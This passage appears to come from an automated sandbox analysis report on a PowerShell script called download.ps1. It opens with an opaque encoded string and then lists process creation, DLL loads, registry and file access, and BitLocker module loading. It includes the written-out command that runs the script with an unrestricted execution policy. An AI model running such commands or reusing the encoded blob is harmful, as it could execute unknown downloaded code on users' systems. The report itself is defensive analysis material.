"eL1ieTluODJ3NNv9PLl3rkjrpxEzy5chB9pZEA4V5x1RvHLRhApPf9vpGCL3VD5soiej2H1gHdiF64XMzQhJ6ytBTnCq1iovENk3wlO7Ymemzo7C6Nv1ImZQRkicyIfGOIvSA0ef/e8oI1lOiYnSx0UUTc2a4YOkrN1RzhdxBcqF8XkW6MkcCISQw+UMSIyFjCG9bvaQQk8NyZSYvtuJkg7WRc6fzYGuyBn0pceFzYG4n1lemMK50rKBts0BCLDzjToxtUzyxdPLkuaH9VT0BepNZ7besSqM3CaRobcF1pNfSGWzfgnkWP7UJsE/UYB30dWG2u86j2Y4CaVGsWQxJXMFcUWaCaLZkmee/eEoZr3Ws85/tCpfzY9zy6oOecWFVI1WrusJ5UDZbjMPUsTn1FFDARy08LUHKm2L58+X7vDpX3sd+kSG+AzDVJZekSLagO+x1PhA4H7fEZDUwgAfum8JIlPYUWDfTAUmRxhNlFH1WukpFpqtWDLjhFOimOnv95xma4iiMFcfhTGaYkEJ+qQFYR/1VJnsglcg72co4rzG0cZ9sA6pIdNyxV5EcblE89vyq1FfXzzQuEy5X6HGFU1XLvxBsaBY063BrygFZHQZ4fhKq79THrJUuP5sLf56qfSFz/AP4HcGsLrSJOUnp1/BO3k6LZ370nF1yL3DiyuuNeErLBqzhLPdZWD45WBVC583nu314bhA41BDOYWK+mhRpC6ADsfMq7jNvZ9jz4rl2I3LHlRfF2O59jWv7Q5zKecQEhrLlfeiyJF9oLTx/ysM/jPUK5g7BfuWxb/vv4N3IuprWe/4l6T81mBFet+MgfLNH+O2jpwdZyDubkH6Kt12UpmBg1IejIeRTOT4IPCdgf/0F6J5VnYQ44H8CwyfutOfhL6pY+W8air9ms6bPsae2yyRs4OD/LWXgd6tt4XtSYudm+fdjofVxNOWIznfPdh09/406q5rhMLxV9u8CZrd3Uo/sOH3Isp7HIi54odCtnBWLkyAAwVg5IGnhoPxta9mbn9kS17Fnc6D9+N8Ad4e1+u2zdVa4KkVzI1p373sixsMC0r8QIhXT9lKOS/GkRIdlgB+VJtk+GcQBOC7zyXUo1aQVgDiEMHfiBaTGMe51i53VySTOCLfiRfvQrtEwsFGjXFujQQkWmAV0CoYJrfdrYa5s7i5WV2/TjOOi4WfHHGBB3DG48mObg63cxUMn9FKrbgoxVrxd9Xkja3DXLl/AKbPhIbd47vthT9dzG3eqIm8HcaOi/ytn/2dKnuCmN2jnGaARUcCy4wRHyWxrpbwZmxusCl0jJoo54XcA7nRshe2BD2u5klI2KlOqU8VwKBg8rcNSnipPOBPHi+5dXlqDsLA3HV476hHYuUrxsb/wTX9zIanWwENYdDYubBkanL6nqyqnsMPqsuXMaGz3tY7eTOHxO8xNNI1RR3YYYeLBb4hUs/NP3ZnCygD1KnEl1aW383w3nTRhWMUCnZxkDnM1uu4BhWK6UmOfks0o7Q51DE4311D8hZSbi4/FG+ipWsetHbpBw0OwtmGkCnEwvwRBE4Fy5eY1PkFhPaP30XWu0P39iGE0XXvUYfMYvchBlpuI3BmwlgFKGfJ+/akd+t7ozD5qZuWtTfQtdCiAv6L7HZxXeAr57BdriFnwfqaFDIXsB1WxZrht46g849A4K/9FzcnuRKZd8Ee6QOHmBa4aDXY1BwSlTVvsgiA9DGgS0Scb6LLOE7yHJ33R4LTbCkFM+vQ2f1GPrZd7xUA5MOzGmytZ3EF5TL34QNkmGGH0WqYVct4+g5UfL5JBvmTABPMtbfzzx2Wi5MtiYmIwTcsbgY8vHEHs7szJph0IG
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: n.pdb> source: powershell.exe, 00000000.00000002.1010148983.0000019C431AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbs.dll source: powershell.exe, 00000000.00000002.1009760762.0000019C4316A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.977310637.0000019C28989000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.977310637.0000019C28989000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1007540490.0000019C42D3B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978107895.0000019C2A638000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1009184849.0000019C42E99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb~ source: powershell.exe, 00000000.00000002.1010148983.0000019C431AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.1007540490.0000019C42D3B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.977310637.0000019C28989000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.978107895.0000019C2A638000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1007540490.0000019C42DFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbdll source: powershell.exe, 00000000.00000002.1009760762.0000019C4316A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8757CD2A5 pushad ; iretd 0_2_00007FF8757CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8758E9D15 push ebx; iretd 0_2_00007FF8758E9D2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8758E18E5 push F8757CCFh; iretd 0_2_00007FF8758E1A29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8758E2300 pushad ; iretd 0_2_00007FF8758E232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8758E232E pushad ; iretd 0_2_00007FF8758E232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF875BA918A push es; retf 0_2_00007FF875BA942F

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
